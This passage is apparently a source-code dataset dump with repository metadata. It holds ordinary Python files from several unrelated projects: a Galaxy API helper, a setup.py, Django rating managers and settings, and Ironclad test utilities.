"CC-BY-3.0"
] | 1
|
2016-09-14T18:09:59.000Z
|
2016-09-14T18:09:59.000Z
|
planemo/galaxy/api.py
|
jmchilton/planemo
|
d352a085fe10cb6b7c1384663b114201da42d97b
|
[
"CC-BY-3.0"
] | null | null | null |
"""A high-level interface to local Galaxy instances using bioblend."""
from six import StringIO
from planemo.bioblend import ensure_module
from planemo.bioblend import galaxy
# Key used when no API key is supplied; matches the test master key Galaxy
# instances launched by planemo are configured with.
DEFAULT_MASTER_API_KEY = "test_key"


def gi(port=None, url=None, key=None):
    """Return a bioblend ``GalaxyInstance`` for Galaxy on this port.

    :param port: local port Galaxy listens on; when given it overrides *url*
    :param url: full base URL of the Galaxy instance (used when *port* is None)
    :param key: API key; defaults to ``DEFAULT_MASTER_API_KEY``
    """
    ensure_module()
    if key is None:
        key = DEFAULT_MASTER_API_KEY
    # A concrete port always wins; the old `url = url` no-op branch is removed.
    if port is not None:
        url = "http://localhost:%d" % int(port)
    return galaxy.GalaxyInstance(
        url=url,
        key=key
    )
def user_api_key(admin_gi):
    """Create (or look up) the planemo test user and return a new API key for it.

    Uses the admin-authenticated bioblend client to find the user by email;
    if absent, creates it (local or remote depending on Galaxy config).
    """
    ensure_module()
    # TODO: thread-safe
    users = admin_gi.users
    user_id = None
    for account in users.get_users():
        if account["email"] == "planemo@galaxyproject.org":
            user_id = account["id"]
    if user_id is None:
        # TODO: Allow override with --user_api_key.
        galaxy_config = admin_gi.config.get_config()
        if bool(galaxy_config["use_remote_user"]):
            created = users.create_remote_user(
                "planemo@galaxyproject.org",
            )
        else:
            created = users.create_local_user(
                "planemo",
                "planemo@galaxyproject.org",
                "planemo",
            )
        user_id = created["id"]
    return users.create_user_apikey(user_id)
def summarize_history(ctx, gi, history_id):
    """Print a verbose, human-readable summary of a Galaxy history.

    Based on similar code in Galaxy for populators. Does nothing unless the
    planemo context is verbose; raises ValueError for a missing history id.
    All fetch failures are reported inline rather than raised — the summary
    is best-effort and must never kill the surrounding run.
    """
    if not ctx.verbose:
        return
    if history_id is None:
        raise ValueError("summarize_history passed empty history_id")
    try:
        history_contents = gi.histories.show_history(history_id, contents=True)
    except Exception:
        print("Failed to fetch history contents in summarize_history.")
        return

    for history_content in history_contents:
        history_content_id = history_content.get('id', None)
        print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name']))
        if history_content['history_content_type'] == 'dataset_collection':
            # Collections have no per-dataset state/provenance; dump and move on.
            history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"])
            print("| Dataset Collection: %s" % history_contents_json)
            continue
        try:
            dataset_info = gi.histories.show_dataset(history_id, history_content_id)
            print("| Dataset State:")
            print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown."))
            print("| Dataset Blurb:")
            print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty."))
            print("| Dataset Info:")
            print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty."))
            print("| Peek:")
            # Typo fix: message previously read "Peek unavilable."
            print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavailable."))
        except Exception:
            print("| *PLANEMO ERROR FETCHING DATASET DETAILS*")
        try:
            provenance_info = _dataset_provenance(gi, history_id, history_content_id)
            print("| Dataset Job Standard Output:")
            print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty."))
            print("| Dataset Job Standard Error:")
            print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty."))
        except Exception:
            print("| *PLANEMO ERROR FETCHING JOB DETAILS*")
        print("|")
def _format_for_summary(blob, empty_message, prefix="| "):
contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")])
return contents or "%s*%s*" % (prefix, empty_message)
def _dataset_provenance(gi, history_id, id):
provenance = gi.histories.show_dataset_provenance(history_id, id)
return provenance
# Public API of this module; star-imports pick up only these names.
__all__ = (
    "DEFAULT_MASTER_API_KEY",
    "gi",
    "user_api_key",
)
| 36.318966
| 121
| 0.635652
|
from six import StringIO
from planemo.bioblend import ensure_module
from planemo.bioblend import galaxy
DEFAULT_MASTER_API_KEY = "test_key"
def gi(port=None, url=None, key=None):
ensure_module()
if key is None:
key = DEFAULT_MASTER_API_KEY
if port is None:
url = url
else:
url = "http://localhost:%d" % int(port)
return galaxy.GalaxyInstance(
url=url,
key=key
)
def user_api_key(admin_gi):
ensure_module()
users = admin_gi.users
all_users = users.get_users()
user_id = None
for user in all_users:
if user["email"] == "planemo@galaxyproject.org":
user_id = user["id"]
if user_id is None:
galaxy_config = admin_gi.config.get_config()
use_remote_user = bool(galaxy_config["use_remote_user"])
if not use_remote_user:
user_response = users.create_local_user(
"planemo",
"planemo@galaxyproject.org",
"planemo",
)
user_id = user_response["id"]
else:
user_response = users.create_remote_user(
"planemo@galaxyproject.org",
)
user_id = user_response["id"]
return users.create_user_apikey(user_id)
def summarize_history(ctx, gi, history_id):
if not ctx.verbose:
return
if history_id is None:
raise ValueError("summarize_history passed empty history_id")
try:
history_contents = gi.histories.show_history(history_id, contents=True)
except Exception:
print("Failed to fetch history contents in summarize_history.")
return
for history_content in history_contents:
history_content_id = history_content.get('id', None)
print("| %d - %s (HID - NAME) " % (int(history_content['hid']), history_content['name']))
if history_content['history_content_type'] == 'dataset_collection':
history_contents_json = gi.histories.show_dataset_collection(history_id, history_content["id"])
print("| Dataset Collection: %s" % history_contents_json)
continue
try:
dataset_info = gi.histories.show_dataset(history_id, history_content_id)
print("| Dataset State:")
print(_format_for_summary(dataset_info.get("state"), "Dataset state is unknown."))
print("| Dataset Blurb:")
print(_format_for_summary(dataset_info.get("misc_blurb", ""), "Dataset blurb was empty."))
print("| Dataset Info:")
print(_format_for_summary(dataset_info.get("misc_info", ""), "Dataset info is empty."))
print("| Peek:")
print(_format_for_summary(dataset_info.get("peek", ""), "Peek unavilable."))
except Exception:
print("| *PLANEMO ERROR FETCHING DATASET DETAILS*")
try:
provenance_info = _dataset_provenance(gi, history_id, history_content_id)
print("| Dataset Job Standard Output:")
print(_format_for_summary(provenance_info.get("stdout", ""), "Standard output was empty."))
print("| Dataset Job Standard Error:")
print(_format_for_summary(provenance_info.get("stderr", ""), "Standard error was empty."))
except Exception:
print("| *PLANEMO ERROR FETCHING JOB DETAILS*")
print("|")
def _format_for_summary(blob, empty_message, prefix="| "):
contents = "\n".join(["%s%s" % (prefix, line.strip()) for line in StringIO(blob).readlines() if line.rstrip("\n\r")])
return contents or "%s*%s*" % (prefix, empty_message)
def _dataset_provenance(gi, history_id, id):
provenance = gi.histories.show_dataset_provenance(history_id, id)
return provenance
__all__ = (
"DEFAULT_MASTER_API_KEY",
"gi",
"user_api_key",
)
| true
| true
|
f705d2280b305e92ead506194e8bf7b9a79b98f6
| 2,143
|
py
|
Python
|
setup.py
|
chowmean/DBSheet
|
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
|
[
"Apache-2.0"
] | 3
|
2017-08-18T20:04:12.000Z
|
2021-01-08T12:23:43.000Z
|
setup.py
|
chowmean/DBSheet
|
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
|
[
"Apache-2.0"
] | 1
|
2021-06-01T23:13:57.000Z
|
2021-06-01T23:13:57.000Z
|
setup.py
|
chowmean/DBSheet
|
3f1c521320cb3564c4ff55cd70c8a1978dd32a4c
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
#
# Python installation script
# Author - @chowmean
from __future__ import print_function
import os.path
import sys
import setuptools
# Project variables
# Paths are resolved relative to this setup.py so builds work from any CWD.
VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties')
REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt')
# Trove classifiers describing the package on PyPI.
CLASSIFIERS = [
    "Programming Language :: Python",
    "Operating System :: OS Independent",
    "Intended Audience :: Developers",
    "Development Status :: 4 - Beta",
    "Environment :: Plugins",
    "Topic :: Software Development :: Libraries :: Python Modules",
    "License :: Other/Proprietary License",
    "Natural Language :: English",
]
# Read version properties file and extract version number.
def get_version():
    """Read the project version from version.properties.

    Falls back to the hard-coded default when the file is missing or
    unreadable (the error is reported to stderr).
    """
    version = "0.1.4"
    try:
        with open(VER_PROP_FILE) as f:
            for line in f.readlines():
                if line.startswith("version="):
                    # Bug fix: str.lstrip('version=') strips a *character set*
                    # ({'v','e','r','s','i','o','n','='}), which can also eat
                    # leading characters of the version value itself. Slice the
                    # prefix off instead.
                    version = line[len("version="):].strip()
                    break
    except IOError as ioe:
        print(ioe, file=sys.stderr)
    return version
# Read requirements.txt file and extract the list of dependency.
def get_install_requirements():
    """Return the dependency list parsed from requirements.txt.

    Aborts the build (exit code 1) when the file cannot be read.
    """
    try:
        with open(REQUIREMENTS_FILE) as f:
            return [line.strip() for line in f.readlines()]
    except IOError as ioe:
        print(ioe, file=sys.stderr)
        sys.exit(1)
if __name__ == '__main__':
    # The README doubles as the PyPI long description.
    with open('README.md', 'r') as f:
        readme = f.read()
    setuptools.setup(
        name="db_sheet",
        version=get_version(),
        description="db_sheet: Using Google Spreadsheets as Database.",
        author="chowmean",
        author_email="gaurav.dev.iiitm@gmail.com",
        url="https://github.com/chowmean/DBSheet",
        keywords=["DBSheet, db_sheet, google spreadsheets. excel"],
        install_requires=get_install_requirements(),
        packages=["db_sheet", ],
        classifiers=CLASSIFIERS,
        long_description=readme,
        long_description_content_type="text/markdown",
        license="Apache-2.0"
    )
| 29.763889
| 79
| 0.643957
|
from __future__ import print_function
import os.path
import sys
import setuptools
VER_PROP_FILE = os.path.join(os.path.dirname(__file__), 'version.properties')
REQUIREMENTS_FILE = os.path.join(os.path.dirname(__file__), 'requirements.txt')
CLASSIFIERS = [
"Programming Language :: Python",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Development Status :: 4 - Beta",
"Environment :: Plugins",
"Topic :: Software Development :: Libraries :: Python Modules",
"License :: Other/Proprietary License",
"Natural Language :: English",
]
def get_version():
version = "0.1.4"
try:
with open(VER_PROP_FILE) as f:
for line in f.readlines():
if line.startswith("version="):
version = line.lstrip('version=').strip()
break
except IOError as ioe:
print(ioe, file=sys.stderr)
return version
def get_install_requirements():
requires = []
try:
with open(REQUIREMENTS_FILE) as f:
requires = list(map(lambda l: l.strip(), f.readlines()))
except IOError as ioe:
print(ioe, file=sys.stderr)
sys.exit(1)
return requires
if __name__ == '__main__':
with open('README.md', 'r') as f:
readme = f.read()
setuptools.setup(
name="db_sheet",
version=get_version(),
description="db_sheet: Using Google Spreadsheets as Database.",
author="chowmean",
author_email="gaurav.dev.iiitm@gmail.com",
url="https://github.com/chowmean/DBSheet",
keywords=["DBSheet, db_sheet, google spreadsheets. excel"],
install_requires=get_install_requirements(),
packages=["db_sheet", ],
classifiers=CLASSIFIERS,
long_description=readme,
long_description_content_type="text/markdown",
license="Apache-2.0"
)
| true
| true
|
f705d35f606de1dd5f2d3137aa565c331846f652
| 5,403
|
py
|
Python
|
djangoratings/managers.py
|
adw0rd/django-ratings
|
941048e05a14bb997966fe1d4e8fd638ee66d76f
|
[
"BSD-2-Clause"
] | 1
|
2021-04-29T11:19:47.000Z
|
2021-04-29T11:19:47.000Z
|
djangoratings/managers.py
|
adw0rd/django-ratings
|
941048e05a14bb997966fe1d4e8fd638ee66d76f
|
[
"BSD-2-Clause"
] | null | null | null |
djangoratings/managers.py
|
adw0rd/django-ratings
|
941048e05a14bb997966fe1d4e8fd638ee66d76f
|
[
"BSD-2-Clause"
] | null | null | null |
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.contrib.contenttypes.models import ContentType
import itertools
class VoteQuerySet(QuerySet):
    """QuerySet for Vote that keeps denormalized rating fields in sync on delete."""

    def delete(self, *args, **kwargs):
        """Handles updating the related `votes` and `score` fields attached to the model."""
        # XXX: circular import
        from fields import RatingField
        qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type')
        to_update = []
        for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]):
            model_class = ContentType.objects.get(pk=content_type).model_class()
            if model_class:
                # Bug fix: the previous code passed `list(objects)[0]` — the first
                # (content_type, object_id) tuple — to pk__in, filtering on the wrong
                # values and missing every other rated object in the group. Collect
                # all object ids for this content type instead.
                object_ids = [object_id for _, object_id in objects]
                to_update.extend(list(model_class.objects.filter(pk__in=object_ids)))
        retval = super(VoteQuerySet, self).delete(*args, **kwargs)
        # TODO: this could be improved
        # Recompute cached score/votes on each affected object now that the
        # underlying votes are gone.
        for obj in to_update:
            for field in getattr(obj, '_djangoratings', []):
                getattr(obj, field.name)._update(commit=False)
            obj.save()
        return retval
class VoteManager(Manager):
    """Default manager for Vote, returning the sync-aware VoteQuerySet."""

    def get_query_set(self):
        return VoteQuerySet(self.model)

    def get_for_user_in_bulk(self, objects, user):
        """Return a mapping of object_id -> Vote for *user* over *objects*.

        Issues a single query; an empty input yields an empty dict.
        """
        objects = list(objects)
        if not objects:
            return {}
        ctype = ContentType.objects.get_for_model(objects[0])
        votes = self.filter(
            content_type__pk=ctype.id,
            object_id__in=[obj._get_pk_val() for obj in objects],
            user__pk=user.id,
        )
        return dict((vote.object_id, vote) for vote in votes)
class SimilarUserManager(Manager):
    # Manager for the similar-users table: serves recommendations based on the
    # votes of users whose past votes agree with the given user's.

    def get_recommendations(self, user, model_class, min_score=1):
        """Return *model_class* objects recommended for *user*.

        An object is recommended when a similar (non-excluded) user rated it
        at least *min_score*, and *user* has neither rated nor ignored it.
        Built with QuerySet.extra() raw-SQL fragments against the vote table.
        """
        from djangoratings.models import Vote, IgnoredObject

        content_type = ContentType.objects.get_for_model(model_class)

        # Table-name shorthands interpolated into the raw SQL below.
        params = dict(
            v=Vote._meta.db_table,
            sm=self.model._meta.db_table,
            m=model_class._meta.db_table,
            io=IgnoredObject._meta.db_table,
        )

        objects = model_class._default_manager.extra(
            tables=[params['v']],
            where=[
                '%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params,
                '%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params,
                '%(v)s.score >= %%s' % params,
                # Exclude already rated maps
                '%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
                # IgnoredObject exclusions
                '%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
            ],
            params=[content_type.id, user.id, min_score, user.id, user.id]
        ).distinct()

        # NOTE(review): earlier pure-ORM formulation kept for reference.
        # objects = model_class._default_manager.filter(pk__in=content_type.votes.extra(
        #     where=['user_id IN (select to_user_id from %s where from_user_id = %d and exclude = 0)' % (self.model._meta.db_table, user.pk)],
        # ).filter(score__gte=min_score).exclude(
        #     object_id__in=IgnoredObject.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True),
        # ).exclude(
        #     object_id__in=Vote.objects.filter(content_type=content_type, user=user).values_list('object_id', flat=True)
        # ).distinct().values_list('object_id', flat=True))

        return objects

    def update_recommendations(self):
        """Rebuild the whole similarity table from the vote table.

        Wipes the table, then inserts one row per (to_user, from_user) pair
        with agree/disagree counts, keeping only pairs whose agreement ratio
        exceeds 3. Uses MySQL-only SQL (``if()``, ``ON DUPLICATE KEY UPDATE``).
        """
        # TODO: this is mysql only atm
        # TODO: this doesnt handle scores that have multiple values (e.g. 10 points, 5 stars)
        #       due to it calling an agreement as score = score. We need to loop each rating instance
        #       and express the condition based on the range.
        from djangoratings.models import Vote
        from django.db import connection, DatabaseError
        cursor = connection.cursor()
        cursor.execute('BEGIN')
        try:
            # TRUNCATE is fastest but not available/permitted everywhere.
            cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,))
        except DatabaseError:
            cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,))
        cursor.execute("""INSERT INTO %(t1)s
          (to_user_id, from_user_id, agrees, disagrees, exclude)
          SELECT v1.user_id, v2.user_id,
                 SUM(if(v2.score = v1.score, 1, 0)) AS agrees,
                 SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0
          FROM %(t2)s AS v1
            INNER JOIN %(t2)s AS v2
              ON v1.user_id != v2.user_id
              AND v1.object_id = v2.object_id
              AND v1.content_type_id = v2.content_type_id
          WHERE v1.user_id is not null
            AND v2.user_id is not null
          GROUP BY v1.user_id, v2.user_id
          HAVING agrees / (disagrees + 0.0001) > 3
          ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict(
            t1=self.model._meta.db_table,
            t2=Vote._meta.db_table,
        ))
        cursor.execute('commit')
        cursor.close()
| 45.403361
| 145
| 0.594855
|
from django.db.models import Manager
from django.db.models.query import QuerySet
from django.contrib.contenttypes.models import ContentType
import itertools
class VoteQuerySet(QuerySet):
def delete(self, *args, **kwargs):
from fields import RatingField
qs = self.distinct().values_list('content_type', 'object_id').order_by('content_type')
to_update = []
for content_type, objects in itertools.groupby(qs, key=lambda x: x[0]):
model_class = ContentType.objects.get(pk=content_type).model_class()
if model_class:
to_update.extend(list(model_class.objects.filter(pk__in=list(objects)[0])))
retval = super(VoteQuerySet, self).delete(*args, **kwargs)
for obj in to_update:
for field in getattr(obj, '_djangoratings', []):
getattr(obj, field.name)._update(commit=False)
obj.save()
return retval
class VoteManager(Manager):
def get_query_set(self):
return VoteQuerySet(self.model)
def get_for_user_in_bulk(self, objects, user):
objects = list(objects)
if len(objects) > 0:
ctype = ContentType.objects.get_for_model(objects[0])
votes = list(self.filter(content_type__pk=ctype.id,
object_id__in=[obj._get_pk_val() \
for obj in objects],
user__pk=user.id))
vote_dict = dict([(vote.object_id, vote) for vote in votes])
else:
vote_dict = {}
return vote_dict
class SimilarUserManager(Manager):
def get_recommendations(self, user, model_class, min_score=1):
from djangoratings.models import Vote, IgnoredObject
content_type = ContentType.objects.get_for_model(model_class)
params = dict(
v=Vote._meta.db_table,
sm=self.model._meta.db_table,
m=model_class._meta.db_table,
io=IgnoredObject._meta.db_table,
)
objects = model_class._default_manager.extra(
tables=[params['v']],
where=[
'%(v)s.object_id = %(m)s.id and %(v)s.content_type_id = %%s' % params,
'%(v)s.user_id IN (select to_user_id from %(sm)s where from_user_id = %%s and exclude = 0)' % params,
'%(v)s.score >= %%s' % params,
'%(v)s.object_id NOT IN (select object_id from %(v)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
'%(v)s.object_id NOT IN (select object_id from %(io)s where content_type_id = %(v)s.content_type_id and user_id = %%s)' % params,
],
params=[content_type.id, user.id, min_score, user.id, user.id]
).distinct()
return objects
def update_recommendations(self):
from djangoratings.models import Vote
from django.db import connection, DatabaseError
cursor = connection.cursor()
cursor.execute('BEGIN')
try:
cursor.execute('TRUNCATE TABLE %s' % (self.model._meta.db_table,))
except DatabaseError:
cursor.execute('DELETE FROM %s' % (self.model._meta.db_table,))
cursor.execute("""INSERT INTO %(t1)s
(to_user_id, from_user_id, agrees, disagrees, exclude)
SELECT v1.user_id, v2.user_id,
SUM(if(v2.score = v1.score, 1, 0)) AS agrees,
SUM(if(v2.score != v1.score, 1, 0)) AS disagrees, 0
FROM %(t2)s AS v1
INNER JOIN %(t2)s AS v2
ON v1.user_id != v2.user_id
AND v1.object_id = v2.object_id
AND v1.content_type_id = v2.content_type_id
WHERE v1.user_id is not null
AND v2.user_id is not null
GROUP BY v1.user_id, v2.user_id
HAVING agrees / (disagrees + 0.0001) > 3
ON DUPLICATE KEY UPDATE agrees=values(agrees), disagrees=values(disagrees);""" % dict(
t1=self.model._meta.db_table,
t2=Vote._meta.db_table,
))
cursor.execute('commit')
cursor.close()
| true
| true
|
f705d6c189996ed6849395984a8050289ed6a38d
| 3,224
|
py
|
Python
|
django_tdd/settings.py
|
migueleichler/django-tdd
|
5b8bd6088b5e2de4d70026b761391bce3aa52f32
|
[
"MIT"
] | null | null | null |
django_tdd/settings.py
|
migueleichler/django-tdd
|
5b8bd6088b5e2de4d70026b761391bce3aa52f32
|
[
"MIT"
] | null | null | null |
django_tdd/settings.py
|
migueleichler/django-tdd
|
5b8bd6088b5e2de4d70026b761391bce3aa52f32
|
[
"MIT"
] | null | null | null |
"""
Django settings for django_tdd project.
Generated by 'django-admin startproject' using Django 1.9.12.
For more information on this file, see
https://docs.djangoproject.com/en/1.9/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.9/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.9/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'agenda',
'test_without_migrations',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_tdd.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_tdd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| 26
| 91
| 0.700682
|
import os
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SECRET_KEY = 'axh7uu^+yfch=#hjgozv%trd3ai55m%xb83=39o4n-y#gk$y6o'
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'agenda',
'test_without_migrations',
]
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'django_tdd.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'django_tdd.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.9/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.9/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.9/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.9/howto/static-files/
STATIC_URL = '/static/'
| true
| true
|
f705d6ce7500355546b594150038c8315daf1d0a
| 9,140
|
py
|
Python
|
tests/utils/cpython.py
|
netcharm/ironclad
|
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
|
[
"PSF-2.0"
] | null | null | null |
tests/utils/cpython.py
|
netcharm/ironclad
|
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
|
[
"PSF-2.0"
] | null | null | null |
tests/utils/cpython.py
|
netcharm/ironclad
|
5892c43b540b216d638e0fed2e6cf3fd8289fdfc
|
[
"PSF-2.0"
] | null | null | null |
from System import IntPtr
from System.Runtime.InteropServices import Marshal
import Ironclad
from Ironclad import CPyMarshal
from Ironclad.Structs import METH, Py_TPFLAGS, PyGetSetDef, PyMemberDef, PyMethodDef, PyTypeObject
from tests.utils.memory import OffsetPtr
def _new_struct(type_, fields, *values):
    """Instantiate *type_* and populate the named fields via .NET reflection.

    Each entry in *fields* names a field descriptor on *type_*; the
    matching positional value is written with FieldInfo.SetValue.
    zip stops at the shorter sequence, so surplus names or values are
    silently ignored.
    """
    instance = type_()
    for field_name, field_value in zip(fields, values):
        descriptor = getattr(type_, field_name)
        descriptor.SetValue(instance, field_value)
    return instance
# Factory helpers: each builds the corresponding Ironclad struct from
# positional values (in declaration order) via _new_struct.
_meth_fields = 'ml_name ml_meth ml_flags ml_doc'.split()
new_PyMethodDef = lambda *args: _new_struct(PyMethodDef, _meth_fields, *args)
_getset_fields = 'name get set doc closure'.split()
new_PyGetSetDef = lambda *args: _new_struct(PyGetSetDef, _getset_fields, *args)
_member_fields = 'name type offset flags doc'.split()
new_PyMemberDef = lambda *args: _new_struct(PyMemberDef, _member_fields, *args)
# Keep-alive list: objects stored here stay referenced and therefore
# cannot be garbage collected until explicitly released.
gc_fooler = []
def GC_NotYet(dgt):
    """Pin *dgt* against garbage collection until the returned callable runs.

    Appends the delegate to the module-level gc_fooler list and returns a
    zero-argument GC_Soon function that removes it again, making the
    delegate collectable.
    """
    def GC_Soon():
        gc_fooler.remove(dgt)
    gc_fooler.append(dgt)
    return GC_Soon
# Maps METH calling-convention flags to the Ironclad delegate type whose
# signature matches how CPython invokes a method with those flags.
DELEGATE_TYPES = {
    METH.OLDARGS: Ironclad.dgt_ptr_ptrptr,
    METH.O: Ironclad.dgt_ptr_ptrptr,
    METH.NOARGS: Ironclad.dgt_ptr_ptrptr,
    METH.VARARGS: Ironclad.dgt_ptr_ptrptr,
    METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
    METH.VARARGS | METH.KEYWORDS: Ironclad.dgt_ptr_ptrptrptr,
}
# COEXIST does not change the calling convention, so each combination also
# maps to the same delegate with COEXIST or'd in.  Iterate over a snapshot
# (list(...)): the loop inserts new keys, and mutating a dict while
# iterating its live items() view raises RuntimeError on Python 3.
for (k, v) in list(DELEGATE_TYPES.items()):
    DELEGATE_TYPES[k | METH.COEXIST] = v
def MakeMethodDef(name, implementation, flags, doc="doc"):
    """Build a PyMethodDef struct wrapping *implementation*.

    Returns a (PyMethodDef, cleanup) pair; the cleanup callable releases
    the keep-alive pin on the marshalled delegate.
    """
    delegate = DELEGATE_TYPES[flags](implementation)
    fn_ptr = Marshal.GetFunctionPointerForDelegate(delegate)
    method_def = new_PyMethodDef(name, fn_ptr, int(flags), doc)
    return method_def, GC_NotYet(delegate)
def MakeGetSetDef(name, get, set, doc, closure=IntPtr.Zero):
    """Build a PyGetSetDef struct wrapping the *get*/*set* callables.

    Either callable may be None/falsy, in which case the corresponding
    slot stays IntPtr.Zero.  Returns a (PyGetSetDef, cleanup) pair; the
    cleanup callable releases the keep-alive pins on any delegates that
    were created.
    """
    deallocs = []
    _get = IntPtr.Zero
    if get:
        getdgt = Ironclad.dgt_ptr_ptrptr(get)
        _get = Marshal.GetFunctionPointerForDelegate(getdgt)
        deallocs.append(GC_NotYet(getdgt))
    _set = IntPtr.Zero
    if set:
        setdgt = Ironclad.dgt_int_ptrptrptr(set)
        _set = Marshal.GetFunctionPointerForDelegate(setdgt)
        deallocs.append(GC_NotYet(setdgt))
    # The original 'lambda: map(apply, deallocs)' relied on Python 2's
    # eager map and the apply builtin (removed in 3.x); under Python 3 it
    # would raise NameError -- or with a lazy map, silently never run the
    # cleanups.  The comprehension calls each cleanup eagerly on both
    # versions and, like Py2 map, returns the list of results.
    return new_PyGetSetDef(name, _get, _set, doc, closure), lambda: [f() for f in deallocs]
def MakeMemberDef(name, type_, offset, flags, doc="doc"):
    """Build a PyMemberDef struct; returns (struct, no-op cleanup).

    A member def owns no delegates, so its cleanup callable has nothing to
